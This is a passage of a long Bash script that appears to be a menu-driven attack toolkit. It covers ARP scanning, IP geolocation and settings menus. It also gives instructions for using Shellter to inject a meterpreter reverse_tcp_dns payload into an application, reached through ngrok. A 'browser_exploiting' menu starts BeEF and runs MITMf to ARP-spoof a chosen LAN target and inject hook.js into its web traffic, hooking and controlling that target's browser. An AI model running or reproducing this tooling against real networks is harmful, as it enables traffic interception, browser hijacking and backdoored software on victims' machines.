  7494. echo -e "Payload was saved to /root/Desktop/"$RAWN".raw"
  7495. fi
  7496. echo -e "$PAKTGB"
  7497. $READAK
  7498. fi
  7499. done
  7500. elif [[ "$SHINT" = 2 ]]
  7501. then
  7502. echo -e "First you should make a raw payload with option 1."
  7503. echo -e "Then open shellter and select your app to be injected."
  7504. echo -e "Then, on stealth mode select y."
  7505. echo -e "Select to type a custom payload, NOT listed."
  7506. echo -e "Then type the path of the payload you have created on option 1."
  7507. echo -e "For the listener, the payload is windows/meterpreter/reverse_tcp_dns"
  7508. echo -e "LHOST is 127.0.0.1 and LPORT is the port you opened to ngrok."
  7509. echo -e "$PAKTGB"
  7510. $READAK
  7511. elif [[ "$SHINT" = "back" || "$SHINT" = "b" ]]
  7512. then
  7513. break
  7514. fi
  7515. done
  7516. elif [[ "$NG" = "back" || "$NG" = "b" || "$NG" = "00" ]]
  7517. then
  7518. clear
  7519. break
  7520. elif [[ "$NG" = 0 ]]
  7521. then
  7522. clear
  7523. exit
  7524. elif [[ "$NG" = 5 ]]
  7525. then
  7526. echo -e "Type your authtoken: "
  7527. read AUTHT
  7528. if [[ "$AUTHT" != "" ]]
  7529. then
  7530. ./ngrok authtoken $AUTHT
  7531. echo -e "$PAKTGB"
  7532. $READAK
  7533. fi
  7534. fi
  7535. else
  7536. echo -e ""$RS"Ngrok is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  7537. read INSTALL
  7538. if [[ "$INSTALL" = "install" ]]
  7539. then
  7540. install_ngrok
  7541. fi
  7542. fi
  7543. done
  7544. }
  7545. function geolocate_ip()
  7546. {
  7547. locbool=1
  7548. echo -e ""$BS"Please wait..."$CE""
  7549. A1="$1"
  7550. AA1=$(is_it_an_ip "$A1")
  7551. if [[ "$AA1" = 1 ]]
  7552. then
  7553. country=$(curl ipinfo.io/"$A1"/country 2>/dev/null)
  7554. if [[ "$country" = "" ]]
  7555. then
  7556. country=""$RS"Not found"$CE""
  7557. fi
  7558. loc=$(curl ipinfo.io/"$A1"/loc 2>/dev/null)
  7559. if [[ "$loc" = "" ]]
  7560. then
  7561. locbool=0
  7562. loc=""$RS"Not found"$CE""
  7563. fi
  7564. city=$(curl ipinfo.io/"$A1"/city 2>/dev/null)
  7565. if [[ "$city" = "" ]]
  7566. then
  7567. city=""$RS"Not found"$CE""
  7568. fi
  7569. org=$(curl ipinfo.io/"$A1"/org 2>/dev/null)
  7570. if [[ "$org" = "" ]]
  7571. then
  7572. org=""$RS"Not found"$CE""
  7573. fi
  7574. postal=$(curl ipinfo.io/"$A1"/postal 2>/dev/null)
  7575. if [[ "$postal" = "" ]]
  7576. then
  7577. postal=""$RS"Not found"$CE""
  7578. fi
  7579. region=$(curl ipinfo.io/"$A1"/region 2>/dev/null)
  7580. if [[ "$region" = "" ]]
  7581. then
  7582. region=""$RS"Not found"$CE""
  7583. fi
  7584. hostname=$(curl ipinfo.io/"$A1"/hostname 2>/dev/null)
  7585. if [[ "$hostname" = "" ]]
  7586. then
  7587. hostname=""$RS"Not found"$CE""
  7588. fi
  7589. echo -e " Country: $country"
  7590. echo -e " Region: $region"
  7591. echo -e " Location: $loc"
  7592. echo -e " City: $city"
  7593. echo -e " Postal: $postal"
  7594. echo -e " Hostname: $hostname"
  7595. echo -e "Organization: $org"
  7596. if [[ "$locbool" = 0 ]]
  7597. then
  7598. echo -e ""$RS" m"$CE") Open google maps location"
  7599. else
  7600. echo -e ""$YS" m"$CE") Open google maps location"
  7601. fi
  7602. echo -e ""$YS" *"$CE") Go back"
  7603. echo -e "Choose: "
  7604. read ge
  7605. if [[ "$ge" = "m" ]]
  7606. then
  7607. if [[ "$locbool" = 0 ]]
  7608. then
  7609. echo -e ""$RS"Location was not found"$CE""
  7610. sleep 3
  7611. else
  7612. gio open https://www.google.gr/maps/search/"$loc"/
  7613. fi
  7614. else
  7615. clear
  7616. BACKL=1
  7617. fi
  7618. else
  7619. echo 0
  7620. fi
  7621. }
  7622. function ip_scan()
  7623. {
  7624.  
  7625. while true
  7626. do
  7627. #passing interface
  7628. IPF=$1
  7629. #passing mode if any (1=choosable 2=only rescanable)
  7630. #Mode 1 is for choosing and returning the IP.
  7631. #Mode 2 is for echoing the scan, no choosing.
  7632. MODE=$2
  7633. export IPF
  7634. if [[ "$IPF" = "" ]]
  7635. then
  7636. echo -e ""$RS"Error 6. No parameters passed"$CE""
  7637. sleep 3
  7638. break
  7639. fi
  7640. #getting local ip
  7641. LLL=$(local_ips $IPF)
  7642. #getting zero ip
  7643. ZERO=$(give_ip_take_zero $LLL)
  7644. export ZERO
  7645. echo -e ""$BS"Scanning, please wait..."$CE""
  7646. tempfile=""$LPATH"/tempscan.txt"
  7647. xterm -geometry 1x1+9999+999999 -e "arp-scan -I "$IPF" "$ZERO"/24 | tee "$tempfile""
  7648. clear
  7649. ######
  7650. T1=$(cat "$tempfile" | grep "Ending arp-scan")
  7651. if [[ "$T1" = "" ]]
  7652. then
  7653. #Sould rescan
  7654. #~ echo -e ""$RS"Common error, retrying..."$CE""
  7655. #~ sleep 2
  7656. #~ clear
  7657. #~ continue
  7658. lines=$(cat $tempfile | awk 'END{print NR}')
  7659. hosts=$((lines-3))
  7660. else
  7661. lines=$(cat $tempfile | awk 'END{print NR}')
  7662. hosts=$((lines-5))
  7663. fi
  7664. if [[ "$hosts" -le 0 ]]
  7665. then
  7666. echo -e ""$RS"No hosts found"$CE""
  7667. sleep 2
  7668. break
  7669. else
  7670. echo -e ""$BS"Host(s) found:"$CE""
  7671. ##########
  7672. n=1
  7673. n2=2
  7674. while [[ "$n" -le "$hosts" ]]
  7675. do
  7676. #Hosts start from line 3
  7677. n1=$((n2+n))
  7678. host[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1 && $0 !~ /DUP:/){print $1}}')
  7679. if [[ "${host[$n]}" = "" ]]
  7680. then
  7681. #sometimes there are duplicate IPs.This should remove them.
  7682. n2=$((n2+1))
  7683. hosts=$((hosts-1))
  7684. #~ n=$((n+1))
  7685. continue
  7686. fi
  7687. size=${#host[$n]}
  7688. sized=$((20-size))
  7689. SPACESN=" "
  7690. numcalc=1
  7691. while [ $numcalc != $sized ]
  7692. do
  7693. SPACESN=""${SPACESN}" "
  7694. numcalc=$(( numcalc+1 ))
  7695. done
  7696. mi[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1){print $2}}')
  7697. im[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1){print $3}}')
  7698. if [[ "$MODE" = 1 ]]
  7699. then
  7700. echo -e ""$YS" $n"$CE") "${host[$n]}"${SPACESN}"${mi[$n]}" "${im[$n]}""
  7701. else
  7702. echo -e ""${host[$n]}"${SPACESN}"${mi[$n]}" "${im[$n]}""
  7703. fi
  7704. n=$((n+1))
  7705. done
  7706. if [[ "$MODE" = 1 ]]
  7707. then
  7708. echo -e ""$YS" r"$CE") Rescan"
  7709. echo -e ""$YS" b"$CE") Go back"
  7710. echo -e "Choose: "
  7711. read sch
  7712. if [[ "$sch" = "b" ]]
  7713. then
  7714. echo ""
  7715. elif [[ "$sch" = "r" ]]
  7716. then
  7717. clear
  7718. continue
  7719. elif [[ "$sch" -le "$hosts" && "$sch" -ge 1 ]]
  7720. then
  7721. OUTPUT="${host[$sch]}"
  7722. export OUTPUT
  7723. #~ echo "$OUTPUT"
  7724. fi
  7725. else
  7726. echo -e ""$YS" r"$CE") Rescan"
  7727. echo -e "Press "$YS"any other key"$CE" to go back"
  7728. read -n 1 ko
  7729. if [[ "$ko" = "r" ]]
  7730. then
  7731. clear
  7732. continue
  7733. else
  7734. BACKL=1
  7735. break
  7736. fi
  7737. fi
  7738. ##########
  7739. fi
  7740. break
  7741. #~ fi
  7742. ######
  7743. done
  7744.  
  7745. }
  7746. function browser_exploiting
  7747. {
  7748. if [[ ! -f /usr/bin/arp-scan ]]
  7749. then
  7750. echo -e ""$BS"Installing arp-scan"$CE""
  7751. install_arp_scan
  7752. clear
  7753. fi
  7754. TAR=""
  7755. SINT=""
  7756. beefrunning=0
  7757. clear
  7758. while true
  7759. do
  7760. clear
  7761. TERMINALTITLE="Auto-exploit browser"
  7762. dash_calc
  7763. printf '\033]2;AUTO-EXPLOIT BROWSER\a'
  7764. if [[ "$SINT" = "" ]]
  7765. then
  7766. WL=$(ifconfig | grep "$WLANN:")
  7767. if [[ "$WL" != "" ]]
  7768. then
  7769. SINT="$WLANN"
  7770. inter=0
  7771. else
  7772. EL=$(ifconfig | grep "$ETH:")
  7773. if [[ "$EL" != "" ]]
  7774. then
  7775. SINT="$ETH"
  7776. inter=0
  7777. else
  7778. SINT=""$RS"Not found"$CE""
  7779. inter=1
  7780. fi
  7781. fi
  7782.  
  7783. fi
  7784. if [[ "$TAR" = "" ]]
  7785. then
  7786. TAR=""$RS"Not set"$CE""
  7787. tarer=1
  7788. fi
  7789. echo -e ""$YS" 1"$CE") Select interface CURRENT:"$YS""$SINT""$CE""
  7790. echo -e ""$YS" 2"$CE") Select target CURRENT:"$YS""$TAR""$CE""
  7791. echo -e ""$YS" 3"$CE") Start BeEF"
  7792. echo -e ""$YS" 4"$CE") Open BeEF's ui panel in browser"
  7793. echo -e ""$YS" 5"$CE") Start MITMf"
  7794. echo -e ""$YS" 6"$CE") Fix errors"
  7795. #~ echo -e ""$YS" 4"$CE") Close all windows"
  7796. echo -e ""$YS" i"$CE") Info"
  7797. echo -e ""$YS" b"$CE") Go back"
  7798. echo -e "Choose: "
  7799. read AEB
  7800. clear
  7801. if [[ "$AEB" = "b" || "$AEB" = 00 ]]
  7802. then
  7803. clear
  7804. BACKL=1
  7805. break
  7806. elif [[ "$AEB" = "i" ]]
  7807. then
  7808. clear
  7809. echo -e ""$LGYS"On this menu you can exploit and control browsers on your network."
  7810. echo -e "Instructions: "
  7811. echo -e "BeEF:"
  7812. echo -e " First you need to specify an interface. Then start BeEF."
  7813. echo -e " Then open the UI panel and log in with beef:beef ."
  7814. echo -e " There you will see if any online browsers."
  7815. echo -e "MITMf:"
  7816. echo -e " First you need to specify an interface and a target. Then start MITMf."
  7817. echo -e " MITMf tries to inject the hook.js javascript to the target's website."$CE""
  7818. echo -e "$PAKTGB"
  7819. $READAK
  7820. elif [[ "$AEB" = 6 ]]
  7821. then
  7822. while true
  7823. do
  7824. clear
  7825. TERMINALTITLE="Fix errors"
  7826. dash_calc
  7827. printf '\033]2;FIX ERRORS\a'
  7828. echo -e ""$YS" 1"$CE") MITMf error: Another process running on port 53"
  7829. echo -e ""$YS" 2"$CE") BeEF error: Another process listening on port 3000"
  7830. echo -e ""$YS" 3"$CE") MITMf error: Could not resolve Gateway's MAC"
  7831. echo -e ""$YS" 4"$CE") MITMf error: [Errno 98] Address already in use"
  7832. echo -e ""$YS" b"$CE") Go back"
  7833. echo -e "Choose: "
  7834. read AE
  7835. clear
  7836. if [[ "$AE" = 1 ]]
  7837. then
  7838. #~ echo -e "For this error, you need to type "$YS"netstat -lnpu | grep :53"$CE" to find the process that runs
  7839. #~ on port 53 and kill it by "$YS"kill <PID>"$CE""
  7840. PID1=$(lsof -t -i:53)
  7841. if [[ "$PID1" = "" ]]
  7842. then
  7843. echo -e ""$RS"Could not find the process running on port 53"$CE""
  7844. else
  7845. kill $PID1 && echo -e ""$YS"Fixed."$CE""
  7846. fi
  7847. echo -e ""
  7848. echo -e "$PAKTGB"
  7849. $READAK
  7850. elif [[ "$AE" = 2 ]]
  7851. then
  7852. echo -e "You are facing this error because you did not press "$YS"ctrl c"$CE" on BeEF's window
  7853. to close it."
  7854. echo -e ""
  7855. PID1=$(lsof -t -i:3000)
  7856. if [[ "$PID1" = "" ]]
  7857. then
  7858. echo -e ""$RS"Could not find the process running on port 3000"$CE""
  7859. else
  7860. kill $PID1 && echo -e ""$YS"Fixed."$CE""
  7861. fi
  7862. echo -e ""
  7863. echo -e "$PAKTGB"
  7864. $READAK
  7865. elif [[ "$AE" = 3 ]]
  7866. then
  7867. echo -e "The only fix on this is to retry mitmf option until it starts correctly."
  7868. echo -e ""
  7869. echo -e "$PAKTGB"
  7870. $READAK
  7871. elif [[ "$AE" = 4 ]]
  7872. then
  7873. HT=$(lsof -t -i:80)
  7874. if [[ "$HT" = "" ]]
  7875. then
  7876. echo -e ""$RS"Could not find the issue"$CE""
  7877. else
  7878. kill "$HT" && echo -e ""$YS"Fixed"$CE""
  7879. fi
  7880. echo -e ""
  7881. echo -e "$PAKTGB"
  7882. $READAK
  7883. elif [[ "$AE" = "b" ]]
  7884. then
  7885. clear
  7886. break
  7887. fi
  7888. done
  7889. elif [[ "$AEB" = 4 ]]
  7890. then
  7891. #make sure BeEF is running.
  7892. if [[ "$beefrunning" = 0 ]]
  7893. then
  7894. echo -e ""$RS"BeEF is not running"$CE""
  7895. sleep 3
  7896. else
  7897. clear
  7898. export SINT
  7899. LOC=$(local_ips $SINT)
  7900. export LOC
  7901. CONF=$(is_it_an_ip $LOC)
  7902. if [[ "$CONF" = 1 ]]
  7903. then
  7904. gio open http://"$LOC":3000/ui/panel
  7905. else
  7906. echo -e ""$RS"Could not find your local IP"$CE""
  7907. sleep 3
  7908. fi
  7909. fi
  7910. elif [[ "$AEB" = 2 ]]
  7911. then
  7912. if [[ "$inter" != 1 ]]
  7913. then
  7914. clear
  7915. while true
  7916. do
  7917. clear
  7918. TERMINALTITLE="Select target"
  7919. dash_calc
  7920. printf '\033]2;SELECT TARGET\a'
  7921. echo -e ""$YS" 1"$CE") Scan and choose"
  7922. echo -e ""$YS" 2"$CE") Type target's IP"
  7923. echo -e ""$YS" b"$CE") Go back"
  7924. echo -e "Choose: "
  7925. read TARR
  7926. clear
  7927. if [[ "$TARR" = "b" ]]
  7928. then
  7929. break
  7930. elif [[ "$TARR" = 1 ]]
  7931. then
  7932. ip_scan $SINT 1
  7933. TARGETI="$OUTPUT"
  7934. size=${#TARGETI}
  7935. if [[ "$size" -le 16 && "$size" -ge 7 ]]
  7936. then
  7937. TAR="$TARGETI"
  7938. tarer=0
  7939. else
  7940. tarer=1
  7941. fi
  7942. break
  7943. elif [[ "$TARR" = 2 ]]
  7944. then
  7945. echo -e "Target: "
  7946. read TARGETI
  7947. size=${#TARGETI}
  7948. if [[ "$size" -le 16 && "$size" -ge 7 ]]
  7949. then
  7950. TAR="$TARGETI"
  7951. tarer=0
  7952. else
  7953. echo -e ""$RS"Invalid IP"$CE""
  7954. tarer=1
  7955. sleep 2
  7956. fi
  7957. break
  7958. fi
  7959. done
  7960. else
  7961. echo -e ""$RS"Select interface first"$CE""
  7962. sleep 2
  7963. fi
  7964. elif [[ "$AEB" = 5 ]]
  7965. then
  7966. if [[ "$inter" = 0 && "$tarer" = 0 ]]
  7967. then
  7968. if [[ -d /root/MITMf ]]
  7969. then
  7970. mitmfint="$SINT"
  7971. export mitmfint
  7972. clear
  7973. mitmfgate=$(route -n | grep "$mitmfint" | awk '{if($2!="0.0.0.0"){print $2}}')
  7974. isit=$(is_it_an_ip "$mitmfgate")
  7975. if [[ "$mitmfgate" != "" && "$isit" = 1 ]]
  7976. then
  7977. export mitmfgate
  7978. clear
  7979. TEST=$(ifconfig | grep $mitmfint)
  7980. if [[ $TEST != "" ]]
  7981. then
  7982. iffile=""$LPATH"/iftemp.txt"
  7983. ifconfig $mitmfint > $iffile
  7984. mitmflocalip=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  7985. else
  7986. echo -e ""$RS"ERROR 5. Could not find your local IP. Make sure you are connected to a network on interface "$SINT""$CE""
  7987. echo -e "$PAKTGB"
  7988. $READAK
  7989. continue
  7990. fi
  7991. clear
  7992. echo -e "hook.js URL path("$YS"Enter"$CE"=http://"$mitmflocalip":3000/hook.js): "
  7993. read hookch
  7994. if [[ "$hookch" = "" ]]
  7995. then
  7996. mitmfhook="http://"$mitmflocalip":3000/hook.js"
  7997. else
  7998. mitmfhook="$hookch"
  7999. fi
  8000. export mitmfhook
  8001. cd /root/MITMf
  8002. clear
  8003. xterm -hold -T "MITMf" -geometry 80x15+9999+9999 -e "python mitmf.py -i "$mitmfint" --spoof --arp --gateway "$mitmfgate" --target "$TAR" --hsts --inject --js-url "$mitmfhook" && echo -e '' && echo -e 'Close this window manually'" & disown
  8004. cd
  8005. else
  8006. echo -e ""$RS"ERROR 4. Could not find gateway. Make sure you are connected to a network on interface "$SINT""$CE""
  8007. echo -e "$PAKTGB"
  8008. $READAK
  8009. fi
  8010. else
  8011. echo -e ""$RS"Mitmf is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."
  8012. read INSTALL
  8013. if [[ "$INSTALL" = "install" ]]
  8014. then
  8015. install_mitmf
  8016. fi
  8017. fi
  8018. cd
  8019. else
  8020. if [[ "$inter" = 1 ]]
  8021. then
  8022. echo -e ""$RS"No interface selected"$CE""
  8023. fi
  8024. if [[ "$tarer" = 1 ]]
  8025. then
  8026. echo -e ""$RS"No target selected"$CE""
  8027. sleep 1
  8028. fi
  8029. sleep 2
  8030. fi
  8031. elif [[ "$AEB" = 3 ]]
  8032. then
  8033. if [[ "$inter" = 1 ]]
  8034. then
  8035. echo -e ""$RS"No interface selected"$CE""
  8036. sleep 2
  8037. continue
  8038. fi
  8039. cd /usr/share/beef-xss
  8040. beefrunning=1
  8041. xterm -T "BEEF" -hold -geometry 80x15+9999+0 -e "./beef && echo -e '' && beefrunning=0 && export beefrunning && echo -e 'Close this window manually'" & disown
  8042. cd
  8043. elif [[ "$AEB" = 0 ]]
  8044. then
  8045. clear
  8046. exit
  8047. elif [[ "$AEB" = 1 ]]
  8048. then
  8049. select_interface
  8050.  
  8051. #if inter=1 then error
  8052. fi
  8053. done
  8054. }
  8055. function settings_menu
  8056. {
  8057. if [[ ! -d "$LPATH"/settings ]]
  8058. then
  8059. mkdir "$LPATH"/settings
  8060. fi
  8061. clear
  8062. while true
  8063. do
  8064. clear
  8065. TERMINALTITLE="SETTINGS"
  8066. dash_calc
  8067. printf '\033]2;SETTINGS\a'
  8068. if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
  8069. then
  8070. read ALFA < "$LPATH"/settings/AWUS036ACH.txt
  8071. else
  8072. ALFA="no"
  8073. fi
  8074. if [[ -f "$LPATH"/settings/startmac.txt ]]
  8075. then
  8076. read STARTMAC < "$LPATH"/settings/startmac.txt
  8077. else
  8078. STARTMAC="00:11:22:33:44:55"
  8079. fi
  8080. if [[ -f "$LPATH"/settings/ignorenegativeone.txt ]]
  8081. then
  8082. read IGN < "$LPATH"/settings/ignorenegativeone.txt
  8083. else
  8084. IGN="no"
  8085. fi
  8086. if [[ -f "$LPATH"/settings/arpin.txt ]]
  8087. then
  8088. read ARPIN < "$LPATH"/settings/arpin.txt
  8089. else
  8090. ARPIN="$WLANN"
  8091. fi
  8092. echo -e ""$YS" 1"$CE") Change logo color"
  8093. echo -e ""$YS" 2"$CE") Howdoi settings"
  8094. echo -e ""$YS" 3"$CE") ALFA AWUS036ACH support $ALFA"
  8095. echo -e ""$YS" 4"$CE") Ignore negative one when deauthing $IGN"
  8096. echo -e ""$YS" 5"$CE") MAC to change to,when starting monitor $STARTMAC"
  8097. echo -e ""$YS" 6"$CE") Interface for arp-scan $ARPIN"
  8098. echo -e ""$YS" 7"$CE") Interface for iftop(show bandwidth) $iftopint"
  8099. echo -e ""$YS" b"$CE") Go back"
  8100. echo -e ""$YS" 0"$CE") Exit"
  8101. echo -e "Choose: "
  8102. read SET
  8103. clear
  8104. if [[ "$SET" = "back" || "$SET" = "b" || "$SET" = "00" ]]
  8105. then
  8106. BACKL=1
  8107. break
  8108. elif [[ "$SET" = 0 ]]
  8109. then
  8110. exit
  8111. elif [[ "$SET" = 7 ]]
  8112. then
  8113. clear
  8114. echo -e ""$BS"Interface to be used for iftop: "$CE""
  8115. read IFTOP
  8116. IFTOPTEST=$(ifconfig | grep "$IFTOP")
  8117. if [[ "$IFTOPTEST" = "" ]]
  8118. then
  8119. echo -e ""$RS""$IFTOP" is not currently available."$CE""
  8120. echo -e "Do you still want to use $IFTOP for iftop?"$YNYES""
  8121. read STARP
  8122. if [[ "$STARP" = "n" ]]
  8123. then
  8124. IFTOP=""
  8125. continue
  8126. fi
  8127. fi
  8128. echo -e "$IFTOP" > "$LPATH"/settings/iftopint.txt
  8129. elif [[ "$SET" = 6 ]]
  8130. then
  8131. clear
  8132. echo -e ""$BS"Interface to be used for arp-scan: "$CE""
  8133. read ARPIN
  8134. ARPINTEST=$(ifconfig | grep "$ARPIN")
  8135. if [[ "$ARPINTEST" = "" ]]
  8136. then
  8137. echo -e ""$RS""$ARPIN" is not currently available."$CE""
  8138. echo -e "Do you still want to use $ARPIN for arp-scan?"$YNYES""
  8139. read STARP
  8140. if [[ "$STARP" = "n" ]]
  8141. then
  8142. ARPIN=""
  8143. continue
  8144. fi
  8145. fi
  8146. echo -e "$ARPIN" > "$LPATH"/settings/arpin.txt
  8147. elif [[ "$SET" = 5 ]]
  8148. then
  8149. clear
  8150. echo -e "Type new MAC("$YS"Enter"$CE"="$DEFMAC"): "
  8151. read NEWMAC
  8152. if [[ "$NEWMAC" = "" ]]
  8153. then
  8154. echo "$DEFMAC" > "$LPATH"/settings/startmac.txt
  8155. else
  8156. sizemac=${#NEWMAC}
  8157. if [[ "$sizemac" != 17 ]]
  8158. then
  8159. echo -e ""$RS"Invalid MAC. Setting it back to default"$CE""
  8160. sleep 4
  8161. else
  8162. echo $NEWMAC > "$LPATH"/settings/startmac.txt
  8163. fi
  8164. fi
  8165. elif [[ "$SET" = 4 ]]
  8166. then
  8167. if [[ "$IGN" = "yes" ]]
  8168. then
  8169. IGN="no"
  8170. else
  8171. IGN="yes"
  8172. fi
  8173. echo -e "$IGN" > "$LPATH"/settings/ignorenegativeone.txt
  8174. elif [[ "$SET" = 3 ]]
  8175. then
  8176. if [[ "$ALFA" = "yes" ]]
  8177. then
  8178. ALFA="no"
  8179. else
  8180. ALFA="yes"
  8181. fi
  8182. echo -e "$ALFA" > "$LPATH"/settings/AWUS036ACH.txt
  8183. elif [[ "$SET" = 2 ]]
  8184. then
  8185. while true
  8186. do
  8187. clear
  8188. if [[ -f "$LPATH"/settings/dispfull.txt ]]
  8189. then
  8190. read dispfull < "$LPATH"/settings/dispfull.txt
  8191. else
  8192. dispfull="false"
  8193. fi
  8194. if [[ -f "$LPATH"/settings/colorout.txt ]]
  8195. then
  8196. read colorout < "$LPATH"/settings/colorout.txt
  8197. else
  8198. colorout="false"
  8199. fi
  8200. if [[ -f "$LPATH"/settings/onlylink.txt ]]
  8201. then
  8202. read onlylink < "$LPATH"/settings/onlylink.txt
  8203. else
  8204. onlylink="false"
  8205. fi
  8206. if [[ -f "$LPATH"/settings/numofans.txt ]]
  8207. then
  8208. read numofans < "$LPATH"/settings/numofans.txt
  8209. else
  8210. numofans="1"
  8211. fi
  8212. echo -e ""$YS" 1"$CE") Display the full answer text "$dispfull""
  8213. echo -e ""$YS" 2"$CE") Colorized output "$colorout""
  8214. echo -e ""$YS" 3"$CE") Display only the answer link "$onlylink""
  8215. echo -e ""$YS" 4"$CE") Number of answers to return "$numofans""
  8216. echo -e ""$YS" 5"$CE") Clear the cache"
  8217. echo -e ""$YS" b"$CE") Go back"
  8218. echo -e "Choose: "
  8219. read HOWCH
  8220. if [[ "$HOWCH" = 1 ]]
  8221. then
  8222. if [[ "$dispfull" = "false" ]]
  8223. then
  8224. dispfull="true"
  8225. else
  8226. dispfull="false"
  8227. fi
  8228. echo "$dispfull" > "$LPATH"/settings/dispfull.txt
  8229. elif [[ "$HOWCH" = 2 ]]
  8230. then
  8231. if [[ "$colorout" = "false" ]]
  8232. then
  8233. colorout="true"
  8234. else
  8235. colorout="false"
  8236. fi
  8237. echo "$colorout" > "$LPATH"/settings/colorout.txt
  8238. elif [[ "$HOWCH" = 3 ]]
  8239. then
  8240. if [[ "$onlylink" = "false" ]]
  8241. then
  8242. onlylink="true"
  8243. else
  8244. onlylink="false"
  8245. fi
  8246. echo "$onlylink" > "$LPATH"/settings/onlylink.txt
  8247. elif [[ "$HOWCH" = 4 ]]
  8248. then
  8249. echo -e "Type number of answers to return: "
  8250. read numofans
  8251. echo "$numofans" > "$LPATH"/settings/numofans.txt
  8252. elif [[ "$HOWCH" = 5 ]]
  8253. then
  8254. howdoi -C
  8255. elif [[ "$HOWCH" = "b" || "$HOWCH" = "back" ]]
  8256. then
  8257. break
  8258. elif [[ "$HOWCH" = 00 ]]
  8259. then
  8260. exec bash $0
  8261. elif [[ "$HOWCH" = 0 ]]
  8262. then
  8263. exit
  8264. fi
  8265. done
  8266. elif [[ "$SET" = 1 ]]
  8267. then
  8268. TERMINALTITLE="LOGO COLORS"
  8269. dash_calc
  8270. echo -e ""$YS" 1"$CE") Light Red (default) "$RS"SAMPLE"$CE""
  8271. echo -e ""$YS" 2"$CE") Red "$DRS"SAMPLE"$CE""
  8272. echo -e ""$YS" 3"$CE") Light Purple "$LPS"SAMPLE"$CE""
  8273. echo -e ""$YS" 4"$CE") Purple "$PS"SAMPLE"$CE""
  8274. echo -e ""$YS" 5"$CE") Light Green "$LGNS"SAMPLE"$CE""
  8275. echo -e ""$YS" 6"$CE") Green "$GNS"SAMPLE"$CE""
  8276. echo -e ""$YS" 7"$CE") Light Cyan "$LCYS"SAMPLE"$CE""
  8277. echo -e ""$YS" 8"$CE") Cyan "$CYS"SAMPLE"$CE""
  8278. echo -e ""$YS" 9"$CE") Light Blue "$LBS"SAMPLE"$CE""
  8279. echo -e ""$YS"10"$CE") Blue "$BS"SAMPLE"$CE""
  8280. echo -e ""$YS"11"$CE") Light Gray "$LGYS"SAMPLE"$CE""
  8281. echo -e ""$YS"12"$CE") Dark Gray "$DGYS"SAMPLE"$CE""
  8282. echo -e ""$YS"13"$CE") Yellow "$YS"SAMPLE"$CE""
  8283. echo -e ""$YS"14"$CE") Brown "$BRS"SAMPLE"$CE""
  8284. echo -e ""$YS"15"$CE") White "$WHS"SAMPLE"$CE""
  8285. echo -e ""$YS"16"$CE") Black "$BLS"SAMPLE"$CE""
  8286. echo -e "Choose: "
  8287. read LC
  8288. if [[ "$LC" = 1 ]]
  8289. then
  8290. echo -e "\e[1;31m" > "$LPATH"/settings/logocolor.txt
  8291. elif [[ "$LC" = 2 ]]
  8292. then
  8293. echo -e "\e[0;31m" > "$LPATH"/settings/logocolor.txt
  8294. elif [[ "$LC" = 3 ]]
  8295. then
  8296. echo -e "\e[1;35m" > "$LPATH"/settings/logocolor.txt
  8297. elif [[ "$LC" = 4 ]]
  8298. then
  8299. echo -e "\e[0;35m" > "$LPATH"/settings/logocolor.txt
  8300. elif [[ "$LC" = 5 ]]
  8301. then
  8302. echo -e "\e[1;32m" > "$LPATH"/settings/logocolor.txt
  8303. elif [[ "$LC" = 6 ]]
  8304. then
  8305. echo -e "\e[0;32m" > "$LPATH"/settings/logocolor.txt
  8306. elif [[ "$LC" = 7 ]]
  8307. then
  8308. echo -e "\e[1;36m" > "$LPATH"/settings/logocolor.txt
  8309. elif [[ "$LC" = 8 ]]
  8310. then
  8311. echo -e "\e[0;36m" > "$LPATH"/settings/logocolor.txt
  8312. elif [[ "$LC" = 9 ]]
  8313. then
  8314. echo -e "\e[1;34m" > "$LPATH"/settings/logocolor.txt
  8315. elif [[ "$LC" = 10 ]]
  8316. then
  8317. echo -e "\e[0;34m" > "$LPATH"/settings/logocolor.txt
  8318. elif [[ "$LC" = 11 ]]
  8319. then
  8320. echo -e "\e[0;37m" > "$LPATH"/settings/logocolor.txt
  8321. elif [[ "$LC" = 12 ]]
  8322. then
  8323. echo -e "\e[1;30m" > "$LPATH"/settings/logocolor.txt
  8324. elif [[ "$LC" = 13 ]]
  8325. then
  8326. echo -e "\e[1;33m" > "$LPATH"/settings/logocolor.txt
  8327. elif [[ "$LC" = 14 ]]
  8328. then
  8329. echo -e "\e[0;33m" > "$LPATH"/settings/logocolor.txt
  8330. elif [[ "$LC" = 15 ]]
  8331. then
  8332. echo -e "\e[1;37m" > "$LPATH"/settings/logocolor.txt
  8333. elif [[ "$LC" = 16 ]]
  8334. then
  8335. echo -e "\e[0;30m" > "$LPATH"/settings/logocolor.txt
  8336. fi
  8337. fi
  8338. done
  8339. }
  8340. function main_options
  8341. {
  8342. if [[ "$YORNAA" = "0" ]]
  8343. then
  8344. exit
  8345. elif [[ "$YORNAA" = "scan" ]]
  8346. then
  8347. if [[ ! -f /usr/bin/arp-scan ]]
  8348. then
  8349. echo -e ""$BS"Installing arp-scan"$CE""
  8350. install_arp_scan
  8351. clear
  8352. fi
  8353. if [[ -f "$LPATH"/settings/arpin.txt ]]
  8354. then
  8355. read ARPIN < "$LPATH"/settings/arpin.txt
  8356. else
  8357. ARPIN="$WLANN"
  8358. fi
  8359. if [[ "$ARPIN" = "" ]]
  8360. then
  8361. ARPIN="$WLANN"
  8362. fi
  8363. TESTARP=$(ifconfig | grep "$ARPIN")
  8364. if [[ "$TESTARP" = "" ]]
  8365. then
  8366. clear
  8367. echo -e ""$RS"$ARPIN was not found"$CE""
  8368. sleep 2
  8369. BACKL=1
  8370. else
  8371. ip_scan $ARPIN 2
  8372. fi
  8373. elif [[ "$YORNAA" = "22" ]]
  8374. then
  8375. CHECK=$(ifconfig | grep "$iftopint")
  8376. if [[ "$CHECK" = "" ]]
  8377. then
  8378. echo -e ""$RS"Interface "$iftopint" was not found"
  8379. sleep 2
  8380. else
  8381. xterm -hold -T "Iftop on $iftopint" -e "iftop -n -i $iftopint -b" & disown
  8382. BACKL=1
  8383. fi
  8384. elif [[ "$YORNAA" = "21" ]]
  8385. then
  8386. sqlmap_menu
  8387. elif [[ "$YORNAA" = "19" ]]
  8388. then
  8389. echo -e ""$BS"IP:"$CE" "
  8390. read IPG
